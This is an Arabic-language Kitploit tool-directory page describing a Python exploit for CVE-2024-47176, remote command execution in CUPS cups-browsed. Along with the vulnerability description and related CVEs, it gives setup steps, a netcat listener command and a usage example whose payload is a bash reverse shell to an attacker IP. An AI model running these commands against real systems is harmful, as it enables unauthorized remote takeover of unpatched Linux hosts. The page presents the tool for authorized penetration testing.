Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-47176 — استغلال Python لـ CVE-2024-47176 يحقق تنفيذ أوامر عن بعد في CUPS cups-browsed عبر حزم UDP مصممة. يتضمن توصيل حمولة شل عكسية لاختبار الاختراق المصرح به. | Kitploit
أدوات/GitHubGitHub/gumerzzzindo/cve-2024-47176
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubgumerzzzindo/cve-2024-47176

CVE-2024-47176

استغلال Python لـ CVE-2024-47176 يحقق تنفيذ أوامر عن بعد في CUPS cups-browsed عبر حزم UDP مصممة. يتضمن توصيل حمولة شل عكسية لاختبار الاختراق المصرح به.

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-47176 — تنفيذ أوامر عن بُعد في CUPS

CVE CVSS Python Platform License

لأغراض تعليمية واختبار الاختراق المأذون به فقط.


جدول المحتويات

  • الوصف
  • الأنظمة المتأثرة
  • CVEs ذات الصلة
  • المتطلبات الأساسية
  • الإعداد
  • الاستخدام
  • إخلاء المسؤولية

الوصف

CUPS (نظام الطباعة الموحد لـ UNIX) هو نظام طباعة مفتوح المصدر يدير الطابعات المتصلة بالشبكة. يستهدف CVE-2024-47176 خدمة التي ترتبط بـ وتثق بشكل أعمى في الحزم من أي مصدر.

cups-browsed
INADDR_ANY:631

من خلال صنع حزمة UDP ضارة تُطلق طلب Get-Printer-Attributes الخاص بـ IPP، يمكن للمهاجم أن يتسبب في اتصال cups-browsed بخادم يتحكم به المهاجم — وعند دمجها مع الثغرات أدناه، يتم تحقيق تنفيذ أوامر تعسفية عن بُعد.


الأنظمة المتأثرة

المكونالشرط
cups-browsedيستمع على UDP 631 (افتراضي)
CUPS < 2.4.11إصدارات غير مصححة
أنظمة Linux مع CUPS مكشوفالمنفذ 631 يمكن الوصول إليه من المهاجم

CVEs ذات الصلة

CVEالوصف
CVE-2024-47176cups-browsed يثق في أي حزمة UDP على المنفذ 631
CVE-2024-47076libcupsfilters لا يُنقّي سمات IPP
CVE-2024-47175libppd يُحقّق بيانات غير منقّاة في ملفات PPD
CVE-2024-47177cups-filters يسمح بتنفيذ الأوامر عبر PPD

المتطلبات الأساسية

  • جهاز الهدف مع المنفذ 631 (IPP/UDP) مكشوف
  • Python 3.x على جهاز الهجوم الخاص بك
  • nmap (اختياري، للاستطلاع)
  • مستمع netcat للقشرة العكسية

الإعداد

1. استنساخ المستودع:

root@kitploit:~
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176

2. تثبيت التبعية Python المطلوبة:

root@kitploit:~
pip install ippserver

3. بدء مستمع على جهازك:

root@kitploit:~
nc -lvnp <PORT>

الاستخدام

root@kitploit:~
./evilcups.py <ATTACKER_IP> <TARGET_IP> "<COMMAND>"

مثال — قشرة عكسية:

root@kitploit:~
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"

بعد تشغيل الاستغلال، قم بتشغيل مهمة طباعة على الهدف (أو انتظر فحصًا تلقائيًا) لتنفيذ الحمولة.


إخلاء المسؤولية

هذا المستودع مخصص لأغراض تعليمية فقط وأبحاث أمنية مأذون بها. استخدام هذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها هو غير قانوني وغير أخلاقي.

تنزيل الأداة